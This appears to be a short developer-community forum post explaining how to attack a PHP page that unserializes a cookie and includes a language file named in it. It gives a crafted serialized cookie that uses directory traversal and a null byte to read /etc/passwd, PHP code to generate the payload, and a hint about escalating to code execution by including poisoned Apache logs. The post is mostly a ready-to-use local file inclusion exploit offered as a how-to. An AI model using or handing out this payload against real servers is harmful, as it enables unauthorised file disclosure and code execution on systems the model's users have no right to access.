how to use this bugs unserialize()-阿里云开发者社区

开发者社区> 开发与运维> 正文

how to use this bugs unserialize()

简介:  quite obvious, you need to set a cookie like this:user_settings=a:1:{s:4:"lang";s:32:".
 <?php

$settings=unserialize($_COOKIE[user_settings]);
include("include/lang/".$settings['lang'].".php");

?>
quite obvious, you need to set a cookie like this:

user_settings=a:1:{s:4:"lang";s:32:"../../../../../../../etc/passwd[null char]";}


it is the result of:

[code lang=php]

<?php

$settings=array();
$settings['lang']="../../../../../../../etc/passwd/x00";
$settings=serialize($settings);
echo $settings;

?>

[/code]

the same with apache logs or something...
where you have injected some php code

版权声明:本文内容由阿里云实名注册用户自发贡献,版权归原作者所有,阿里云开发者社区不拥有其著作权,亦不承担相应法律责任。具体规则请查看《阿里云开发者社区用户服务协议》和《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容,填写侵权投诉表单进行举报,一经查实,本社区将立刻删除涉嫌侵权内容。

分享:
开发与运维
使用钉钉扫一扫加入圈子
+ 订阅

集结各类场景实战经验,助你开发运维畅行无忧

其他文章